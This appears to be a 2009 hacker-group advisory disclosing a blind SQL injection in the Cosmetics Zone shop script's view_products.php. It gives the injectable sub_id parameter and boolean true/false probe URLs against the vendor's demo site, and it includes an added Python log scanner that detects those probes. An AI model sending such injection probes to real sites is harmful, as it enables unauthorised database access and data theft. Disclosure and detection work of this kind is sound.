Cosmetics Zone suffers from a remote blind SQL injection vulnerability in view_products.php.
[x]========================================================================================================================================[x]
| AntiSecurity[dot]org |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Title : Cosmetics Zone view_products.php?cat_id= Blind SQL Injection Vulnerability |
| Software : Cosmetics Zone |
| Vendor : http://www.vastal.com/ |
| Demo : http://www.vastal.com/cosmetics_zone |
| Price : $299.99 |
| Date : 23 September 2009 ( Indonesia ) |
| Author : OoN_Boy |
| Contact : oon.boy9@gmail.com |
| Web : http://oonboy.info |
| Blog : http://oonboy.blogspot.com |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Description : Cosmetics Zone allows you to run a successful cosmetics shop by using the Cosmetics Zone product. We have provided |
| the following features for the Cosmetics Zone product: Browse by Categories, Search, PayPal integration, |
| Multiple Color Attributes for products having different colors, compatibility with PayPal IPN, Multiple Languages and |
| many more. Please see the demo site for more details, and feel free to contact us at any time for any inquiries or |
| for setting up a site like this. |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/[path]/view_products.php?cat_id=5&sub_id=[sql] |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : http://www.vastal.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=1-- True |
| http://www.vastal.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=2-- False |
[x]========================================================================================================================================[x]
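Added defensive example, not part of this advisory: a Python scan over constructed Apache access-log lines that flags the true/false probe pair the proof of concept above sends to the sub_id and cat_id parameters of view_products.php, and reports client addresses that sent both halves of the pair. The /shop install path and the client IPs are assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

WATCHED_PARAMS = {"cat_id", "sub_id"}  # the query parameters the advisory names
LOG_LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# A numeric id followed by a boolean condition, e.g. "4 and 1=1--" or "4 or 2=3".
PROBE = re.compile(r"^\d+\s*'?\s*(?:and|or)\s+(\S+?)\s*=\s*(\S+?)(?:--|#|\s|$)", re.I)

def classify(value):
    """Return 'true', 'false' or None for a parameter value carrying a boolean probe."""
    m = PROBE.match(value)
    if not m:
        return None
    left, right = (s.strip("'\"") for s in m.groups())
    return "true" if left == right else "false"

def parse_line(line):
    """Return (ip, param, value, verdict) hits for watched params of view_products.php."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    ip, target, _status = m.groups()
    url = urlparse(target)
    if not url.path.endswith("/view_products.php"):
        return []
    # parse_qs URL-decodes values, so "4+and+1=1--" arrives here as "4 and 1=1--".
    query = parse_qs(url.query, keep_blank_values=True)
    return [(ip, name, v, verdict) for name in query if name in WATCHED_PARAMS
            for v in query[name] if (verdict := classify(v))]

def scan(lines):
    """Map each client IP to the set of probe verdicts it sent."""
    per_ip = {}
    for line in lines:
        for ip, _name, _value, verdict in parse_line(line):
            per_ip.setdefault(ip, set()).add(verdict)
    return per_ip

def differential_probers(lines):
    """IPs that sent both a true and a false probe: paired testing, not a stray apostrophe."""
    return sorted(ip for ip, v in scan(lines).items() if v == {"true", "false"})

# Constructed sample lines (Apache combined format); the /shop path and IPs are assumptions.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Sep/2009:10:00:01 +0700] "GET /shop/view_products.php?cat_id=5&sub_id=4 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [23/Sep/2009:10:00:05 +0700] "GET /shop/view_products.php?cat_id=5&sub_id=4+and+1=1-- HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [23/Sep/2009:10:00:06 +0700] "GET /shop/view_products.php?cat_id=5&sub_id=4+and+1=2-- HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [23/Sep/2009:10:00:09 +0700] "GET /shop/index.php?cat_id=5+and+1=1-- HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
]
```

Feeding a real access log line by line into differential_probers() yields the addresses worth correlating with the response sizes, which differ between the true and false halves exactly as the proof of concept relies on.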
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id |
| h4ntu Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va |
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Note : Please help to vote me in http://8.17.84.100/planyouradventour/profil_team.php?uid_group=1466598338 |
[x]========================================================================================================================================[x]